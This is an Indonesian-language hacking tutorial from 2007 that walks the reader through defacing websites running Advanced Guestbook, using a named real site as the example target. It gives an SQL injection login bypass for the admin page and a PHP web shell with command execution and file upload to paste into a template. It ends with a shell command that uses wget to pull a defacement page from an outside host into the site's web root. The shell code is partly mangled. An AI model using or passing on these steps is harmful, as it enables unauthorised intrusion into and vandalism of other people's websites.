hacking

Deface situs via Advanced Guestbook
February 1st, 2007

Disini kamu musti usaha sendiri mencari target nya.
                  Langkah-langkah nya :

                  1. http://www.smackfoundation.com/forum4/admin.php
                 

                  2. Kemudian inject :
                 

Username:
                  Password: ‘)or(’a'=’a

                  3. Setelah kamu masuk maka akan muncul :

                  Private Messages | Easy Admin | General Settings | Style | Templates | Smilies | Password | Logout

                 
                  Pilih Templates trus pilih url.php Hapus lah script yg ada
                  disana. Kemudian copy pastekan script ini :

                  Jambihackerlink Crew Defacement
                 
                 
                                    chdir($_POST['dir']); } ?>
                 

                 
                 

Advanced Guestbook Injection


                                    if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls
                  -la ; pwd ;id "; }
                  echo "";
                  echo "
";
                  echo "
";
                  ?>
                 

                 
                                    if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"]))
                  {
                  copy($HTTP_POST_FILES["filenyo"][tmp_name],
                  $_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name])
                  or print("                  bgcolor=#000000>
file gak isa di uplod ".$HTTP_POST_FILES["filenyo"][name]."
");
                  }
                  ?>
                 

                 
                                    echo "
";
                  echo "";
                  echo "[CmD ] ";
                  if ((!$_POST['dir']) OR ($_POST['dir']==""))
                  { echo " [Dir]                  value=".exec("pwd").">"; }
                  else { echo "";
                  }
                  echo " ";
                  echo "
";
                  echo "
";
                  ?>
                 

                                                                        echo "";                   echo "";                   echo " [EcHo]";                   echo " ";                   if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "                   type=hidden name=dir size=70 value=".exec("pwd").">"; }                   else { echo "";                   }                   echo "";                   echo "";                   echo "";                   ?>                  

                 

                  Kemudian klik tab "Submit Settings" yg dibawah.

                  4. Buka url/browsing baru trus ketik http://www.smackfoundation.com/forum4/templates/url.php
                 

                  5. Di kolom cmd ketik :

                  cd /home/smack/public_html;wget http://k.domaindlx.com/jambihackerlinkcrew/jh.htm

                  Trus klik tab Submit, tunggu beberapa saat…….

                  6. Kalo udah, buka url/browsing baru lalu ketikkan situs
                  target tadi, misal nya : http://www.smackfoundation.com/jh.htm
                  Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas
                  disamping url/browsing.
Bookmark and Share